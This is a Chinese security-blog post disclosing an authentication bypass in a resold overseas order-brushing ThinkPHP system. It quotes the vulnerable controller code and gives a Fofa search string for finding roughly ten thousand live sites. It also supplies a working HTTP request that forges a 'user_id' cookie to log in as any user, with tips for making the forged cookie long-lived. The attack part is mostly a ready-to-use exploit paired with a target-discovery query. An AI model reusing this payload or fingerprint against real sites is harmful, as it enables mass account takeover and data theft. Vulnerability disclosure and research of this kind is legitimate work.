点击上方蓝字关注我们 并设为星标
0x00 前言
源码简介: 二开版海外抢单Shua单系统/用户风险值/叠加组/打针/订单自动匹配系统,此套别人二开的海外抢单Shua单系统,新增用户风险值、最后做单时间,带三级分销,权限代理后台,充值提现优先完美后台查询功能
Fofa:"/red/popper.min.js"
框架:ThinkPHP 5.1.41 Debug:True 默认后台:/admin/login
用户量还挺多的,fofa能搜到1w.
0x01 漏洞分析
/**
* 验证登录控制器
*/
class Base extends Controller
{
protected $rule = ['__token__' => 'token'];
protected $msg = ['__token__' => '无效token!'];
protected $_uid;
function __construct(App $app)
{
parent::__construct($app);
if (config('shop_status') == 0) exit();
$uid = session('user_id');
if (!$uid) {
$uid = cookie('user_id');
}
//echo App::VERSION;exit;
/*if (request()->subDomain() == 'cs' || request()->subDomain() == '') {
header('Location:' . 'https://www.' . request()->rootDomain());
exit();
}*/
$controller = strtolower(request()->controller());
if ($controller == 'user') return;
if (!$uid && request()->isPost()) {
$this->error(lang('no_login'));
}
if (!$uid) $this->redirect('User/login');
$this->_uid = $uid;
}
}
0x02 漏洞复现
Payload:
GET /index/index HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Length: 73
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: user_id=1
Host: 127.0.0.1:81
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
User-Token-Csrf: csrf66e28d7ebbffa
X-Requested-With: XMLHttpRequest
sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
使用Google浏览器的F12-应用-存储-Cookie 或 EditCookie 插件可直接伪造长效Cookie
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转,RCE
抢单系统 源码关注公众号,发送 240913 获取.
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):某二开版海外抢单Shua单系统存在任意用户登录漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论